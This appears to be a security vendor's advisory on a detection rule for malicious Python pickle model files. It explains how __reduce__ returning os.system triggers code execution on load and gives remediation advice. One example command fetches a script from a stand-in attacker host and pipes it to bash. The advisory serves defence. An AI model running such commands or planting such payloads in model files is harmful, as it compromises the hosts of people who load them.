Araştırmalara Dön
Deserialization Threats

Python Pickle Arbitrary Code Execution Detected

Eresus Security Research TeamGüvenlik Araştırmacısı
10 Nisan 2026
4 dk okuma

Overview

Python’s pickle module is the traditional standard for serializing (saving) and deserializing (loading) complex object structures. In modern machine learning, it is frequently used to store model weights, training configurations, and pipeline states (often seen as .pkl, .bin, .pt, or .pth files).

However, pickle is inherently insecure by design. The Python documentation explicitly warns developers that unpickling data from an untrusted source can lead to Arbitrary Code Execution (ACE) and Remote Code Execution (RCE). When a system deserializes a malicious pickle file, it processes a stack of opcodes that act as a virtual machine.

If Eresus Sentinel flags a PAIT-PKL-100 vulnerability in your ML pipeline, it means it has detected a weaponized pickle payload explicitly containing malicious constructor methods attempting to execute raw system commands upon initialization.

The Role of __reduce__ in Exploitation

To weaponize a pickle file, threat actors leverage the Python __reduce__ magic method. When an object defines __reduce__, it tells the pickle.load() function exactly how to reconstruct the object. An attacker can craft a class where __reduce__ returns the os.system callable alongside an operating system command argument (e.g., wget http://malicious-c2.com/malware.sh | bash).

The absolute moment the data scientist or the production server calls pickle.load(file), the payload executes natively with the exact privileges of the host program—completely bypassing standard API security gateways.

How The Attack Works

Cybercriminals upload poisoned .pkl or .pt files to public model repositories (like Hugging Face) masquerading as standard pre-trained models. A victim downloads the model, trusting its origin, and attempts to load it into their PyTorch or scikit-learn environment.

sequenceDiagram
    participant Attacker
    participant File_System as File / Repository
    participant MLOps_Engineer as Victim (MLOps)
    participant Python_VM as Python Interpreter
    participant OS as Host OS

    Attacker->>File_System: Creates payload returning 'os.system' via __reduce__
    Attacker->>File_System: Uploads malicious.pkl masquerading as an ML model
    MLOps_Engineer->>File_System: Downloads malicious.pkl
    MLOps_Engineer->>Python_VM: Executes 'pickle.load()'
    Python_VM->>OS: Deserializes bytecode & evaluates 'os.system(malicious_script)'
    OS-->>Attacker: Reverse shell established / Database exfiltrated

Key Points

  • Zero-Click Execution: The victim does not need to run a specific setup script. Simply loading the model to inspect its weights is enough to detonate the malware.
  • Deep Supply Chain Risk: Because ML frameworks historically relied on pickle by default (such as earlier versions of PyTorch), the entire industry is exposed to legacy model poisoning.
  • Evades Traditional Antivirus: The malicious logic is compiled into Python-specific bytecodes (opcodes), meaning standard endpoint detection software (EDR) rarely flags .pkl files as executable malware.

Impact

Loading a malicious Pickle file grants the attacker exactly the same permissions as the process running the python script. In a local Data Scientist's workspace, this means full access to their filesystem, AWS/GCP keys, and internal VPNs. In a deployed production server, this enables an immediate host takeover, lateral movement across the Kubernetes cluster, and mass exfiltration of proprietary training data.

Best Practices for ML Serialization

To fortify your artificial intelligence workflows against deserialization exploits:

  • Abandon Pickle for Weights: Migrate your infrastructure away from pickle. Utilize static, data-only formats such as Safetensors or ONNX, which explicitly prevent arbitrary code execution by storing only mathematical tensors.
  • Use Trusted Hubs: Only download models from definitively trusted authors and organizations. Use cryptographic signatures to verify model provenance.
  • Sandboxed Loading: If you absolutely must initialize an unknown legacy .pkl file, do so in an ephemeral Docker container devoid of internet access and IAM permissions.

Remediation

If Eresus Sentinel detects PAIT-PKL-100, instantly terminate the host environment. Delete the flagged .pkl file from all storage buckets and local developer machines. Conduct a forensic review to determine if the payload successfully triggered outbound network traffic or accessed .env credential files. Replace the model with a Safetensors equivalent permanently.

Further Reading

Understand the depths of Python serialization insecurity with these detailed industry reports:


📥 Eresus Sentinel Scans Pickle Files Before They Detonate With Eresus Sentinel, you can actively scan legacy .pkl, .bin, and .pt files for concealed __reduce__ payloads before your ML developers load them. Stop Zero-Click execution attacks instantly and enforce secure ML protocols.

Learn more | Book a Demo